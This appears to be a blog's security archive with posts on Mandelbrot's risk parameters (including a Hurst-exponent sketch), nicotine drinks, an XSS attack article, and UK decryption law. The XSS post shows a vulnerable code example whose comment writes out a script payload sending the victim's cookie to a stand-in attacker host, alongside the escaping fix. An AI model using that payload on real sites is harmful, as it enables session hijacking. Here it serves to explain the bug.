Category Archives: Security

Mandelbrot on financial risk

A book review on Amazon provides a prickly rebuke to Mandelbrot and Hudson’s new theories on financial risk:

Because the two main assumptions of modern finance are flawed, all related models are flawed as they understate risk. If such models understate risk, they actually overprice stocks and underprice options, and also understate the capital financial institutions should hold to withstand market risk.

If the author had stopped there, I would have given him a 5 rating. However, such a rebuttal of finance theory would make no more than a great essay. Instead, he attempts to build an entirely different edifice of modern finance over 300 pages. And, his theoretical foundation lacks any robustness. That’s why I call it a castle of cards.

Mandelbrot builds his edifice of modern finance on two new parameters that would replace the mean return and volatility of return or standard deviation (mean and standard deviation being the parameters defining a normal distribution). His first parameter, Alpha, derived from Pareto’s Law, is an exponent that measures how wildly prices vary. It defines how fat the tails of the price change curve are. The second one, the H Coefficient, borrowed from a hydrologist named Hurst, is an exponent that measures the dependence of price changes upon past changes.

Well, what is wrong with these two measures? He confesses at the end of the book that no two individuals calculate the same Alpha and H Coefficient when using the exact same historical data! Apparently, there is no one established way to calculate these two parameters. The divergence between the various methodologies can be huge. Using one method, you could derive Alpha and H coefficients that suggest a stock is not risky; using another method you would reach the opposite conclusion. So, after reading nearly 300 pages of intense theory, you find that its foundations are at this stage nonexistent. If Alpha and H are not mathematically replicable and well defined, you can’t apply his multifractal geometry model in any meaningful way.

I haven’t read the book yet, so I’ll hold off on commenting, but the reviewer makes some excellent points about the inherent flaws in risk calculations that are worth noting here.
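For a sense of the replicability problem the reviewer describes, here is a rough sketch of one common way to estimate the H coefficient, rescaled-range (R/S) analysis. The code and the window choices are mine, not anything from the book. Even within this single method the estimate depends on choices such as which window sizes go into the log-log fit, so two people analyzing the same price history can come away with different values of H.

```python
import numpy as np

def hurst_rs(series, window_sizes):
    """Estimate the Hurst exponent H by rescaled-range (R/S) analysis."""
    rs_means = []
    for w in window_sizes:
        rs_vals = []
        for i in range(len(series) // w):
            chunk = series[i * w:(i + 1) * w]
            cumdev = np.cumsum(chunk - chunk.mean())  # cumulative deviations from the window mean
            r = cumdev.max() - cumdev.min()           # range of the cumulative deviations
            s = chunk.std(ddof=1)                     # sample standard deviation of the window
            if s > 0:
                rs_vals.append(r / s)
        rs_means.append(np.mean(rs_vals))
    # H is the slope of log(R/S) against log(window size)
    slope, _intercept = np.polyfit(np.log(window_sizes), np.log(rs_means), 1)
    return slope

rng = np.random.default_rng(0)
returns = rng.standard_normal(4096)  # i.i.d. returns, for which the "true" H is 0.5

# Same data, two reasonable window grids, and often two noticeably different answers
print(hurst_rs(returns, [8, 16, 32, 64]))
print(hurst_rs(returns, [128, 256, 512, 1024]))
```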

Nicotine drinks

I overheard someone talking about the latest “energy” drinks in Japan and their nicotine content. This sounded odd to me, so I did a little research and found that there are in fact companies putting nicotine into drinks. Here, for example, is nicotine-laced fruit juice:

The delivery system should prove popular, with growth in the functional beverage market, and more accessible than over-the-counter smoking-cessation products. But nicotine-based drinks are faced with significant safety issues, as well as taste concerns.

Finished products will need to mask the ‘pepper’ taste of nicotine yet contain enough of the ingredient to be effective.

Drinks are already considered habit-forming, so you have to wonder about the “safer than a cigarette” marketing program. Will this be sold as an over-the-counter refreshment? I would hate to buy one by accident, which is exactly what started the conversation that grabbed my interest: someone did not realize the drink they had bought contained nicotine and could not believe it would even be legal.

XSS Cookbook

Busy day. I already have half a dozen things to post, but in the interest of time and brevity I just wanted to mention a guide to cross-site scripting attacks. This kind of article, subtitled “Three Ingredients for a Successful Hack”, reminds me of the controversy over the Anarchist Cookbook, updated for the digital age:

Cross site scripting (XSS) errors are generally considered nothing more than a nuisance — most people do not realize the inherent danger these types of bugs create. In this article Seth Fogie looks at a real life XSS attack and how it was used to bypass the authentication scheme of an online web application, leading to “shell” access to the web server.
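The attack in the article is more involved than this, but for anyone who has never seen the basic pattern, here is a generic sketch (Python, purely illustrative, not taken from Fogie’s article) of a reflected XSS bug and its simplest fix: escaping user input before it is reflected back into the page.

```python
import html

def render_results_unsafe(query: str) -> str:
    # Vulnerable: user input is reflected verbatim into the page, so a query like
    #   <script>new Image().src='http://evil.example/?c='+document.cookie</script>
    # runs in the victim's browser and can hand their session cookie to an attacker.
    return f"<p>Results for: {query}</p>"

def render_results_safe(query: str) -> str:
    # Fixed: HTML-escape anything user-supplied before reflecting it back.
    return f"<p>Results for: {html.escape(query)}</p>"

payload = "<script>alert('xss')</script>"
print(render_results_unsafe(payload))  # the script tag survives intact
print(render_results_safe(payload))    # &lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;
```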

Great. Now back to helping people find and quickly remove XSS vulnerabilities…

Encryption and the road to hell

This morning’s BBC report has brought to light the ongoing debate over how to enforce the UK Regulation of Investigatory Powers Act 2000 (RIPA).

Part III of RIPA gives law enforcement agencies the decryption powers and, provided some conditions are met, makes it a serious offence to refuse to turn scrambled files into an “intelligible” form. Those refusing could see their sentence increased as a result.

The government is holding a consultation exercise on the code of conduct that those using these powers will have to abide by.

The code was debated at a public meeting organised by digital rights group the Foundation for Information Policy Research (FIPR).

This debate seems to start from the age-old issue of whether people can be required to incriminate themselves when the police are unable to find evidence against them. This situation, however, is more complicated, because encryption keys are so easily hidden or destroyed. Moreover, encrypted data is frustratingly easy for law enforcement to find precisely because it is so difficult for them to decipher: the same random-looking structure that resists analysis also makes ciphertext stand out. In theory you could leave encrypted files lying around without fear of them being used as evidence against you, unlike a smoking gun or a bloody knife, so to speak.
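To make that concrete, here is a small illustrative sketch (mine, not anything described in the BBC report): output from any decent modern cipher is statistically close to random noise, so even a crude entropy check will flag encrypted files on a disk while their contents stay unreadable.

```python
import math
import os
from collections import Counter

def byte_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; 8.0 means uniformly random bytes."""
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

plaintext = b"the quick brown fox jumps over the lazy dog " * 200
ciphertext_like = os.urandom(len(plaintext))  # stands in for well-encrypted data

print(byte_entropy(plaintext))        # ordinary text: well below 8 bits per byte (about 4.3 here)
print(byte_entropy(ciphertext_like))  # close to 8 bits per byte, easy to spot, impossible to read
```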

So, just as encryption is finally starting to be adopted on personal computers, the police are demanding either special privileges such as a back-door or the right to impose severe penalties on anyone refusing to decrypt data on demand. It is interesting to read that the US government seems to be moving ahead (“VA to spend $3.7M on encryption tools”), since those adopters must be watching the UK with curiosity to see what kind of liabilities they could bring upon themselves. They spend money trying to avoid one kind of liability and could simply end up with a different set (e.g. will internal investigators be able to access VA data without alerting suspects or demanding decryption?).

Mr Bowden [former head of FIPR] also questioned the wisdom of making it an offence to refuse to unscramble evidence. He said there were many scenarios that made it possible for a suspect to deny they ever had the key that unlocked encrypted data.

Already, he said, there had been one court case in which a suspect was acquitted after claiming a computer virus under someone else’s control had caused the offences for which he faced trial. Mr Bowden speculated that other suspects could use the same tactic or would fake a virus infection to get themselves off the hook.

There is certainly no silver bullet here, so it is good to see the debate taking place. Unfortunately, finding common ground is complicated by a lack of experience and of examples to help everyone strike an appropriate balance.

The key management systems and encryption I have deployed have always met resistance, primarily from those least familiar with what the technology can and will do for them. I usually tell people that encryption, like other tools, is a double-edged sword that needs careful guidance and legislation/policy to help ensure proper use and prevent misuse. Many people feel strongly about these issues, so it is important to review the possibilities early to avoid unpleasant surprises. Or, as Lord Phillips of Sudbury put it:

“You do not secure the liberty of our country and value of our democracy by undermining them,” he said. “That’s the road to hell.”